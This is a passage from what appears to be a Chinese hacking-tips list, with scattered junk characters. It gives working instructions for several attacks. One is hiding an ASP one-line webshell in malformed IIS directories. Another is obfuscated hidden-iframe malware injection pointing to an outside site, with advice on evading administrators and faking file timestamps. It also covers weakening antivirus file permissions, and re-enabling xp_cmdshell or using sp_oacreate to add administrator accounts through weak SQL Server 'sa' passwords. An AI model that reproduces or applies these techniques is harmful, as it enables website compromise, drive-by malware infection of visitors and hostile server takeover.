, ?9 {; ^( m' {: j" }0 m- e53、隐藏ASP后门的两种方法0 z4 h1 I: X+ S1 Q( g
1、建立非标准目录:mkdir images..\. x% h/ l( P$ c5 }2 p$ \9 y' S# S$ @
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
+ @& C" x6 X3 x, x+ T7 l; D通过web访问ASP木马:http://ip/images../news.asp?action=login
1 R' T* o7 ^8 \* U" c7 U如何删除非标准目录:rmdir images..\ /s1 F$ S9 g; b3 Q5 n G. }7 c
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:& b. t$ J+ H; z' ]
mkdir programme.asp7 X0 n2 I; r% t; k4 h# s/ D$ i
新建1.txt文件内容:<!--#include file=”12.jpg”-->6 p4 {! \- [$ B- O
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件1 ^$ f+ @) J, U+ ^0 G0 l
attrib +H +S programme.asp
+ R4 A2 m; H( w) F, K: m- x" l通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
7 I/ ~4 A) t1 ~# w5 r6 [9 ?/ P. }3 F$ D+ \: `
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。7 p- U9 k# S$ `1 F. t
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
# j! T! W7 o( j8 W0 T! n3 d0 Q8 X6 h( S
55、JS隐蔽挂马: ^8 L( m3 E4 ]: S; c V- _
1.
/ U6 N4 D) L6 U: Hvar tr4c3="<iframe src=ht";( i) V& L7 S( y, E
tr4c3 = tr4c3+"tp:/";3 c" k" l3 d$ @& T
tr4c3 = tr4c3+"/ww";+ m2 I4 |* a6 o
tr4c3 = tr4c3+"w.tr4";
9 J7 R" k/ _* ?- M1 D: U1 J6 Rtr4c3 = tr4c3+"c3.com/inc/m";5 P* g7 ?5 f% H8 H, q- O% u4 k
tr4c3 = tr4c3+"m.htm style="display:none"></i";
) ` g, R% T* C. b# t# ?0 x. ltr4c3 =tr4c3+"frame>'";
. K2 N! {; @% O# C! l- wdocument.write(tr4c3);
- f& F Y. {! c4 q- ?' t避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。2 T7 s' E5 f8 O/ D; _
7 h, j& P+ q7 e3 W# u" p/ T/ G2.
. ?/ J( w+ Q) g; z1 }9 T转换进制,然后用EVAL执行。如
" |( @: ^- B) X |- geval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");' ^" I2 ^8 m j" z; [. G7 i. h! m& T
不过这个有点显眼。
2 h& o2 `* i' M" h3.2 R0 ?: }' J; x1 n
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
- } K: K. s5 X, D" j0 t最后一点,别忘了把文件的时间也修改下。
+ g' I+ g( @( m# D( w; }! L p* f+ H- B h6 ]4 A
56.3389终端入侵常用DOS命令
4 R' |6 c) O$ }2 }9 gtaskkill taskkill /PID 1248 /t) r! E- O E: L/ B1 }8 p1 [. X
5 L/ D6 M; s) S" s/ Z. _# btasklist 查进程: R: g; Q3 Q' p" A& o
, c2 C! `$ |3 w2 B9 n! zcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限6 U. ^" K; Q% }3 ^# s' ]
iisreset /reboot
! Z% F) r' u( t- G! `; r7 ltsshutdn /reboot /delay:1 重起服务器) C% Y% C3 \/ `! ]0 K
- L% j0 J6 k3 D; s8 Glogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
# d) ]8 u) G' r/ c% o% Q5 t; D
, x0 F+ e1 [" ?query user 查看当前终端用户在线情况
4 p# T9 T" f0 M; y; P7 ?% C( @+ s, n7 \9 W7 y3 ~7 j
要显示有关所有会话使用的进程的信息,请键入:query process *# b7 @" G, d1 h1 p$ i+ {8 v, S! D; I
1 A0 h M. X3 ^2 L; ~. E4 P; j
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:21 N w+ F" N6 o7 i4 k( F7 w
8 }& @* r4 [2 m1 J% S4 _+ [
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
" P8 E9 \- e5 Q7 i7 h% i
. c8 ~, W+ t2 y4 ], l7 X0 a$ K7 \" U要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02. }3 _9 W- T" O1 t9 w) s: R
8 T; p: ]" g& I- B* a. \2 L命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启- ^- v4 b) W3 X, M2 i
l, e, T/ K, m命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
6 a/ o r3 z# G' G) L/ i. w0 S b9 u( G* ~
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。0 M ^+ N5 }( P+ z
9 G1 G/ z+ b8 A. L7 c
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机9 ~' I! c1 f1 X) n$ I& H
$ ^2 ^( `: a, p# O8 i56、在地址栏或按Ctrl+O,输入:
b. D' U% m- w5 f/ E% M% jjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;6 i0 K6 E# G9 W
: |" p( s i* I8 ^* y3 }0 X源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。/ u/ L' l3 {+ @& d/ S% f8 z
+ x9 v/ m* B+ Z- L) s; B
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,* J% Q* K1 _8 e {" h2 y* d' X
用net localgroup administrators是可以看到管理组下,加了$的用户的。7 I, T& w4 G# c$ e: Q
% h" ?$ o* P+ V9 e% _; W58、 sa弱口令相关命令( p# D/ ^, I4 Y7 A. `( G. _% K
: k, _* u7 {7 o* u" ~
一.更改sa口令方法:% u% ~9 {2 g( M. J" b% C1 Y
用sql综合利用工具连接后,执行命令:/ O: ^5 f: K( D# l X4 e
exec sp_password NULL,'20001001','sa'
1 u# q( O- v9 L2 {) o$ P(提示:慎用!)
, z5 ?6 \: `: b) x. M2 ^
0 y6 X+ R1 ^6 Y/ ]+ a, t- M二.简单修补sa弱口令.9 R3 ^/ c% v0 Y2 M9 e& l
' o5 B8 ~ v1 N# F- _方法1:查询分离器连接后执行:
9 }# P% h; O7 \9 q5 I" S% ]if exists (select * from" Z0 c2 C N2 C& E* `2 _! H& r+ h
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
1 d( [, D ~! S) j( g8 YOBJECTPROPERTY(id, N'IsExtendedProc') = 1)7 v- g* x' a2 X$ t" Z& {7 P! K
6 ^1 A6 P" e% ~1 |8 k
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
7 b8 @ }$ v8 h8 D# C5 V" T
* }4 |( L: ]6 d! o" G! f7 SGO
+ h9 s J% u- D% j( B2 `2 n3 n+ Y6 l- A# \; h( K% o
然后按F5键命令执行完毕
) q, q( v) a s" Y& y& ?* o9 U/ I& n5 [- A
方法2:查询分离器连接后6 ~8 ^- q- V6 p4 G1 D' c& q, E
第一步执行:use master5 B- U/ `: t$ I/ r J t' P
第二步执行:sp_dropextendedproc 'xp_cmdshell'
) ^& S- s; p6 A' }- o4 A然后按F5键命令执行完毕& z2 h( I7 y+ }1 Z
, W( F( X2 [. y* @* n1 ?2 o9 r2 t! y+ H- d
三.常见情况恢复执行xp_cmdshell.
1 b" C b( ]0 {6 C$ V
, I g: B" b# a! e' e+ t$ \- r7 Q! _8 i5 p
1 未能找到存储过程'master..xpcmdshell'.1 h3 y c, @4 P" E C
恢复方法:查询分离器连接后,
- Y; {* Y) \6 H. q; ~5 I" j第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* N/ s$ Y# @; u8 d/ V/ q5 Y7 o第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 I2 i' z) S4 _& i* ?% R
然后按F5键命令执行完毕
L1 f$ \' V) P: {0 n' B( Q. S% ] j. v- X
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)" N9 B- G% g1 q( D
恢复方法:查询分离器连接后,3 T8 f3 d# D6 E% M" @# F; q; O
第一步执行:sp_dropextendedproc "xp_cmdshell"
" b$ L3 Z+ a6 l' O R6 e7 k第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'- J" u# w$ x, P# u1 ^1 B
然后按F5键命令执行完毕
! S, B; Z; F4 d! }
8 s% h, ?4 r1 @( D1 \) `3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. k0 I" Z: D2 r0 r0 Z& P* C% I" ^: _恢复方法:查询分离器连接后,
0 d4 z' G6 z7 w' `第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
% Y/ J7 L1 B" v4 p) W5 Q- m! |, ?4 Y第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' $ g3 E9 N1 `3 l, i! w
然后按F5键命令执行完毕
$ s: F4 Y. g* O% t6 [" w! v! |3 M. j5 e' j2 M+ T
四.终极方法.
; H x! d8 P6 o如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:, I' S5 C5 D4 K# l. P8 f6 l+ \) {7 j
查询分离器连接后,& V, ~4 J' F6 |/ w/ x0 [8 _- I
2000servser系统:
4 h0 b1 K; M0 u1 `declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
, v; \2 N0 X" S$ _& p/ o3 O& q: r- M7 P0 _3 ^* J& p7 Y' U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'2 P. @) i( ^& R( N% K* J
2 \( C) D8 w$ L! b) L
xp或2003server系统:
; P8 z% U; P" \ C, M4 ]
$ I+ \ E% k3 {+ E. W9 Y5 K: Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'- [( e# L4 }5 y: \
/ b Z2 q$ D4 M4 E |- C3 g; B+ T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 M3 L; X) ^+ W! x u
|